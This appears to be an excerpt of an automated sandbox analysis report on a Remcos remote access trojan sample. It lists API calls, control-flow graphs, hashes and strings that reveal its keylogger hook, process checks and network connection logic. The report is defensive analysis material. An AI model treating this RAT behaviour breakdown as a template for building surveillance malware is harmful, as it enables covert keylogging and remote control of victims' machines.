                                                    • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040EA1C), ref: 0041CC16
                                                    • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CC19
                                                    • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040EA1C), ref: 0041CC2B
                                                    • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CC2E
                                                    • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,0040EA1C), ref: 0041CC3F
                                                    • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CC42
                                                    • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,0040EA1C), ref: 0041CC54
                                                    • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CC57
                                                    • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,0040EA1C), ref: 0041CC63
                                                    • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CC66
                                                    • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040EA1C), ref: 0041CC77
                                                    • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CC7A
                                                    • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040EA1C), ref: 0041CC8B
                                                    • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CC8E
                                                    • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040EA1C), ref: 0041CC9F
                                                    • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CCA2
                                                    • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040EA1C), ref: 0041CCB3
                                                    • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CCB6
                                                    • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040EA1C), ref: 0041CCC7
                                                    • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CCCA
                                                    • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040EA1C), ref: 0041CCDB
                                                    • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CCDE
                                                    • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040EA1C), ref: 0041CCEF
                                                    • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CCF2
                                                    • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040EA1C), ref: 0041CD03
                                                    • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CD06
                                                    • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,0040EA1C), ref: 0041CD14
                                                  • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\FPPhfkcDCh.exe,00000104), ref: 0040EA29
                                                    • Part of subcall function 00410F72: __EH_prolog.LIBCMT ref: 00410F77
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4123999742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.4123961205.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124033465.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124082369.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FPPhfkcDCh.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AddressProc$Module$Handle$LibraryLoad$FileH_prologName
                                                  • String ID: SG$ SG$,aF$,aF$86l$8SG$8SG$Access Level: $Administrator$C:\Users\user\Desktop\FPPhfkcDCh.exe$Exe$Exe$Inj$PSG$Remcos Agent initialized$Software\$User$`m$dMG$del$del$exepath$licence$license_code.txt
                                                  • API String ID: 2830904901-2666574466
                                                  • Opcode ID: a37f44002cb11f4d109de69a12e971d519bba5be2c89de6862324a1ba10f536d
                                                  • Instruction ID: f870588dacc207cf398a21a9077505b2b75b96970711a81e27f166ce8512e3fa
                                                  • Opcode Fuzzy Hash: a37f44002cb11f4d109de69a12e971d519bba5be2c89de6862324a1ba10f536d
                                                  • Instruction Fuzzy Hash: 9B32F960B043412BDA24B7729C57B7E26994F80748F50483FB9467B2E3EEBC8D45839E

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1277 40a2f3-40a30a 1278 40a30c-40a326 GetModuleHandleA SetWindowsHookExA 1277->1278 1279 40a36e-40a37e GetMessageA 1277->1279 1278->1279 1282 40a328-40a36c GetLastError call 41bc1f call 4052fd call 402093 call 41b580 call 401fd8 1278->1282 1280 40a380-40a398 TranslateMessage DispatchMessageA 1279->1280 1281 40a39a 1279->1281 1280->1279 1280->1281 1283 40a39c-40a3a1 1281->1283 1282->1283
                                                  APIs
                                                  • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 0040A30E
                                                  • SetWindowsHookExA.USER32(0000000D,0040A2DF,00000000), ref: 0040A31C
                                                  • GetLastError.KERNEL32 ref: 0040A328
                                                    • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                  • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0040A376
                                                  • TranslateMessage.USER32(?), ref: 0040A385
                                                  • DispatchMessageA.USER32(?), ref: 0040A390
                                                  Strings
                                                  • Keylogger initialization failure: error , xrefs: 0040A33C
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4123999742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.4123961205.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124033465.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124082369.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FPPhfkcDCh.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Message$DispatchErrorHandleHookLastLocalModuleTimeTranslateWindows
                                                  • String ID: Keylogger initialization failure: error
                                                  • API String ID: 3219506041-952744263
                                                  • Opcode ID: 90b0715fe4a03c7950091ea493cf6ac8be3b9c9bd1286eec6a190886210d1988
                                                  • Instruction ID: 8743f2250fb8cae6a99ae5fb3d4b34fe2baf279f6720e4878f05ffc9670b3ffc
                                                  • Opcode Fuzzy Hash: 90b0715fe4a03c7950091ea493cf6ac8be3b9c9bd1286eec6a190886210d1988
                                                  • Instruction Fuzzy Hash: 6011BF31510301EBC710BB769D0986B77ACEA95715B20097EFC82E22D1EB34C910CBAA

                                                  Control-flow Graph

                                                  APIs
                                                    • Part of subcall function 00413584: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 004135A4
                                                    • Part of subcall function 00413584: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,?,004752F0), ref: 004135C2
                                                    • Part of subcall function 00413584: RegCloseKey.KERNEL32(?), ref: 004135CD
                                                  • Sleep.KERNEL32(00000BB8), ref: 0040F896
                                                  • ExitProcess.KERNEL32 ref: 0040F905
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4123999742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.4123961205.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124033465.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124082369.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FPPhfkcDCh.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseExitOpenProcessQuerySleepValue
                                                  • String ID: 5.1.2 Pro$86l$override$pth_unenc
                                                  • API String ID: 2281282204-3428557361
                                                  • Opcode ID: a923fdcb63fb9afbcdfb401b6ff65f984a31e5ddc3d6c19a03220c9eafa155c3
                                                  • Instruction ID: d275b5d15c9ff05a0ec0da3c9587874d7690dc7fa5d0ec02d6e8a4ede61593ab
                                                  • Opcode Fuzzy Hash: a923fdcb63fb9afbcdfb401b6ff65f984a31e5ddc3d6c19a03220c9eafa155c3
                                                  • Instruction Fuzzy Hash: 5921E171B0420127D6087676885B6AE399A9B80708F50453FF409672D7FF7C8E0483AF

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1426 404f51-404f5f 1427 404f65-404f6c 1426->1427 1428 404fea 1426->1428 1430 404f74-404f7b 1427->1430 1431 404f6e-404f72 1427->1431 1429 404fec-404ff1 1428->1429 1432 404fc0-404fe8 CreateEventA CreateThread 1430->1432 1433 404f7d-404fbb GetLocalTime call 41bc1f call 4052fd call 402093 call 41b580 call 401fd8 1430->1433 1431->1432 1432->1429 1433->1432
                                                  APIs
                                                  • GetLocalTime.KERNEL32(?), ref: 00404F81
                                                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00404FCD
                                                  • CreateThread.KERNEL32(00000000,00000000,Function_00005150,?,00000000,00000000), ref: 00404FE0
                                                  Strings
                                                  • KeepAlive | Enabled | Timeout: , xrefs: 00404F94
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4123999742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.4123961205.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124033465.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124082369.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FPPhfkcDCh.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Create$EventLocalThreadTime
                                                  • String ID: KeepAlive | Enabled | Timeout:
                                                  • API String ID: 2532271599-1507639952
                                                  • Opcode ID: d6bdf093f7aea2e5024bc4ba9810f3b5686ab9589db354a71a8a5fd0b8ad62b9
                                                  • Instruction ID: 41fa32a9fb91b1633a7afb8999ae97baef60c60c8d6252053b050d354fdafbcf
                                                  • Opcode Fuzzy Hash: d6bdf093f7aea2e5024bc4ba9810f3b5686ab9589db354a71a8a5fd0b8ad62b9
                                                  • Instruction Fuzzy Hash: 82110A71800385BAC720A7779C0DEAB7FACDBD2714F04046FF54162291D6B89445CBBA
                                                  APIs
                                                  • GetComputerNameExW.KERNEL32(00000001,?,0000002B,`m), ref: 0041B6BB
                                                  • GetUserNameW.ADVAPI32(?,0040F25E), ref: 0041B6D3
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4123999742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.4123961205.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124033465.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124082369.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FPPhfkcDCh.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Name$ComputerUser
                                                  • String ID: `m
                                                  • API String ID: 4229901323-2103878915
                                                  • Opcode ID: 2a75debd1ac83804218ef8ff91a3dd31c7e5d47f43b5da7d436b4f8c80832694
                                                  • Instruction ID: 8360233331794fbd8bccde093e114755ab2a7c2896376219b9d5f45c8fb32f7b
                                                  • Opcode Fuzzy Hash: 2a75debd1ac83804218ef8ff91a3dd31c7e5d47f43b5da7d436b4f8c80832694
                                                  • Instruction Fuzzy Hash: 90014F7190011CABCB01EBD1DC45EEDB7BCAF44309F10016AB505B21A1EFB46E88CBA8
                                                  APIs
                                                  • CryptAcquireContextA.ADVAPI32(00000000,00000000,00000000,00000001,F0000000,?,00000000,00433550,00000034,?,?,006E9618), ref: 004338DA
                                                  • CryptGenRandom.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,004335E3,00000000,?,00000000), ref: 004338F0
                                                  • CryptReleaseContext.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,?,?,004335E3,00000000,?,00000000,0041E2E2), ref: 00433902
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4123999742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.4123961205.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124033465.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124082369.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FPPhfkcDCh.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Crypt$Context$AcquireRandomRelease
                                                  • String ID:
                                                  • API String ID: 1815803762-0
                                                  • Opcode ID: 81ae4bbc27a0383ddd18646ed4cc5f88ed8aa0b0f15284250c3048956b898281
                                                  • Instruction ID: d68cd6f5f98cbfa2ab0450769c499d20ea76a36e668e3df749659bd42d9a4b78
                                                  • Opcode Fuzzy Hash: 81ae4bbc27a0383ddd18646ed4cc5f88ed8aa0b0f15284250c3048956b898281
                                                  • Instruction Fuzzy Hash: 40E09A31208310FBEB301F21AC08F573AA5EF89B66F200A3AF256E40E4D6A68801965C
                                                  APIs
                                                  • WaitForSingleObject.KERNEL32(00000000,000000FF,?,00474EF8,00404C49,00000000,00000000,00000000,?,00474EF8,?), ref: 00404BA5
                                                  • SetEvent.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040548B), ref: 00404BC3
                                                  • recv.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404BDA
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4123999742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.4123961205.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124033465.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124082369.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FPPhfkcDCh.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: EventObjectSingleWaitrecv
                                                  • String ID:
                                                  • API String ID: 311754179-0
                                                  • Opcode ID: cdb06e8163b8322063f134be74ce7e1cf20e247c26aa7992d3e9e0113c183a83
                                                  • Instruction ID: 0899ded2458b7d4720508400fe02e5f5257555b40415190a6d7bc1514cf1b529
                                                  • Opcode Fuzzy Hash: cdb06e8163b8322063f134be74ce7e1cf20e247c26aa7992d3e9e0113c183a83
                                                  • Instruction Fuzzy Hash: 53F05E36108212FFC7019F10EC09E0AFB62FB85721F10862AF510512B08771FC20DB95
                                                  APIs
                                                  • GetLocaleInfoA.KERNEL32(00000800,0000005A,00000000,00000003,?,?,?,00415537,00474EE0,00475A00,00474EE0,00000000,00474EE0,00000000,00474EE0,5.1.2 Pro), ref: 0040F920
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4123999742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.4123961205.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124033465.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124082369.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FPPhfkcDCh.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: InfoLocale
                                                  • String ID:
                                                  • API String ID: 2299586839-0
                                                  • Opcode ID: 2888965568e38a2ba7a5abe7093904758464576a93ba76aee1c710f175ee0f35
                                                  • Instruction ID: 54543d52817102a935349e0949155b160d3bd36039d058f0142c014f19b14c2e
                                                  • Opcode Fuzzy Hash: 2888965568e38a2ba7a5abe7093904758464576a93ba76aee1c710f175ee0f35
                                                  • Instruction Fuzzy Hash: D5D05B3074421C77D61096959D0AEAA779CD701B52F0001A6BB05D72C0D9E15E0087D1

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 448 414f65-414fad call 4020df call 41b944 call 4020df call 401e65 call 401fab call 43bb2c 461 414fbc-415008 call 402093 call 401e65 call 4020f6 call 41beac call 40489e call 401e65 call 40b9f8 448->461 462 414faf-414fb6 Sleep 448->462 477 41500a-415079 call 401e65 call 40247c call 401e65 call 401fab call 401e65 call 40247c call 401e65 call 401fab call 401e65 call 40247c call 401e65 call 401fab call 40473d 461->477 478 41507c-415117 call 402093 call 401e65 call 4020f6 call 41beac call 401e65 * 2 call 406c59 call 402f10 call 401fe2 call 401fd8 * 2 call 401e65 call 405b05 461->478 462->461 477->478 531 415127-41512e 478->531 532 415119-415125 478->532 533 415133-4151c5 call 405aa6 call 40531e call 406383 call 402f10 call 402093 call 41b580 call 401fd8 * 2 call 401e65 call 401fab call 401e65 call 401fab call 414f24 531->533 532->533 560 415210-41521e call 40482d 533->560 561 4151c7-41520b WSAGetLastError call 41cb72 call 4052fd call 402093 call 41b580 call 401fd8 533->561 567 415220-415246 call 402093 * 2 call 41b580 560->567 568 41524b-415260 call 404f51 call 4048c8 560->568 584 415ade-415af0 call 404e26 call 4021fa 561->584 567->584 583 415266-4153b9 call 401e65 * 2 call 40531e call 406383 call 402f10 call 406383 call 402f10 call 402093 call 41b580 call 401fd8 * 4 call 41b871 call 4145f8 call 409097 call 441ed1 call 401e65 call 4020f6 call 40247c call 401fab * 2 call 413733 568->583 568->584 648 4153bb-4153c8 call 405aa6 583->648 649 4153cd-4153f4 call 401fab call 4135e1 583->649 596 415af2-415b12 call 401e65 call 401fab call 43bb2c Sleep 584->596 597 415b18-415b20 call 401e8d 584->597 596->597 597->478 648->649 655 4153f6-4153f8 649->655 656 4153fb-415a45 call 40417e call 40ddc4 call 41bcd3 call 41bdaf call 41bc1f call 401e65 GetTickCount call 41bc1f call 41bb77 call 41bc1f * 2 call 41bb27 call 41bdaf * 5 call 40f90c call 41bdaf call 402f31 call 402ea1 call 402f10 call 402ea1 call 402f10 * 3 call 402ea1 call 402f10 call 406383 call 402f10 call 406383 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 406383 call 402f10 * 5 call 402ea1 call 402f10 call 402ea1 call 402f10 * 7 call 402ea1 call 404aa1 call 401fd8 * 50 call 401f09 call 401fd8 * 6 call 401f09 call 404c10 649->656 655->656 901 415a4a-415a51 656->901 902 415a53-415a5a 901->902 903 415a65-415a6c 901->903 902->903 904 415a5c-415a5e 902->904 905 415a78-415aaa call 405a6b call 402093 * 2 call 41b580 903->905 906 415a6e-415a73 call 40b08c 903->906 904->903 917 415aac-415ab8 CreateThread 905->917 918 415abe-415ad9 call 401fd8 * 2 call 401f09 905->918 906->905 917->918 918->584
                                                  APIs
                                                  • Sleep.KERNEL32(00000000,00000029,004752F0,`m,00000000), ref: 00414FB6
                                                  • WSAGetLastError.WS2_32(00000000,00000001), ref: 004151C7
                                                  • Sleep.KERNEL32(00000000,00000002), ref: 00415B12
                                                    • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4123999742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.4123961205.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124033465.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124082369.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FPPhfkcDCh.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Sleep$ErrorLastLocalTime
                                                  • String ID: | $%I64u$,aF$5.1.2 Pro$86l$8SG$C:\Users\user\Desktop\FPPhfkcDCh.exe$Connected | $Connecting | $Connection Error: $Connection Error: Unable to create socket$Disconnected$Exe$PSG$TLS Off$TLS On $`m$dMG$hlight$name$NG$NG
                                                  • API String ID: 524882891-2175989343
                                                  • Opcode ID: b738e14f9ae15f51a9009464235e1bfd1d4331b14d9c9dba1bf263d3fc93f7e1
                                                  • Instruction ID: 9dea7478a43989413a8a7de35667e348ffff56bc780dedce428272fd6db975fd
                                                  • Opcode Fuzzy Hash: b738e14f9ae15f51a9009464235e1bfd1d4331b14d9c9dba1bf263d3fc93f7e1
                                                  • Instruction Fuzzy Hash: B8526C31A001155ACB18F732DD96AFEB3769F90348F5044BFE40A761E2EF781E858A9D

                                                  Control-flow Graph

                                                  APIs
                                                  • Sleep.KERNEL32(00001388), ref: 0040A77B
                                                    • Part of subcall function 0040A6B0: CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,0040A788), ref: 0040A6E6
                                                    • Part of subcall function 0040A6B0: GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040A788), ref: 0040A6F5
                                                    • Part of subcall function 0040A6B0: Sleep.KERNEL32(00002710,?,?,?,0040A788), ref: 0040A722
                                                    • Part of subcall function 0040A6B0: CloseHandle.KERNEL32(00000000,?,?,?,0040A788), ref: 0040A729
                                                  • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 0040A7B7
                                                  • GetFileAttributesW.KERNEL32(00000000), ref: 0040A7C8
                                                  • SetFileAttributesW.KERNEL32(00000000,00000080), ref: 0040A7DF
                                                  • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00000012), ref: 0040A859
                                                    • Part of subcall function 0041C516: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,0040A87E), ref: 0041C52F
                                                  • SetFileAttributesW.KERNEL32(00000000,00000006,00000013,00466478,?,00000000,00000000,00000000,00000000,00000000), ref: 0040A962
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4123999742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.4123961205.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124033465.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124082369.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FPPhfkcDCh.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: File$AttributesCreate$Sleep$CloseDirectoryExistsHandlePathSize
                                                  • String ID: 8SG$8SG$`m$pQG$pQG$xdF
                                                  • API String ID: 3795512280-2682917571
                                                  • Opcode ID: db686e10471e88e88e6c2a6410797b3bbe7a67903047043a717f9aa792139144
                                                  • Instruction ID: 2a79d88b44a8fc0b04dcb000ea34af81e4c48788ca5147296d011aa32960a087
                                                  • Opcode Fuzzy Hash: db686e10471e88e88e6c2a6410797b3bbe7a67903047043a717f9aa792139144
                                                  • Instruction Fuzzy Hash: B6516E716043015ACB15BB72C866ABE77AA9F80349F00483FF646B71E2DF7C9D09865E

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1023 4048c8-4048e8 connect 1024 404a1b-404a1f 1023->1024 1025 4048ee-4048f1 1023->1025 1028 404a21-404a2f WSAGetLastError 1024->1028 1029 404a97 1024->1029 1026 404a17-404a19 1025->1026 1027 4048f7-4048fa 1025->1027 1030 404a99-404a9e 1026->1030 1031 404926-404930 call 420cf1 1027->1031 1032 4048fc-404923 call 40531e call 402093 call 41b580 1027->1032 1028->1029 1033 404a31-404a34 1028->1033 1029->1030 1043 404941-40494e call 420f20 1031->1043 1044 404932-40493c 1031->1044 1032->1031 1036 404a71-404a76 1033->1036 1037 404a36-404a6f call 41cb72 call 4052fd call 402093 call 41b580 call 401fd8 1033->1037 1040 404a7b-404a94 call 402093 * 2 call 41b580 1036->1040 1037->1029 1040->1029 1057 404950-404973 call 402093 * 2 call 41b580 1043->1057 1058 404987-404992 call 421ad1 1043->1058 1044->1040 1084 404976-404982 call 420d31 1057->1084 1069 4049c4-4049d1 call 420e97 1058->1069 1070 404994-4049c2 call 402093 * 2 call 41b580 call 421143 1058->1070 1081 4049d3-4049f6 call 402093 * 2 call 41b580 1069->1081 1082 4049f9-404a14 CreateEventW * 2 1069->1082 1070->1084 1081->1082 1082->1026 1084->1029
                                                  APIs
                                                  • connect.WS2_32(FFFFFFFF,?,?), ref: 004048E0
                                                  • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00404A00
                                                  • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00404A0E
                                                  • WSAGetLastError.WS2_32 ref: 00404A21
                                                    • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4123999742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.4123961205.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124033465.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124082369.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FPPhfkcDCh.jbxd
                                                  Yara matches
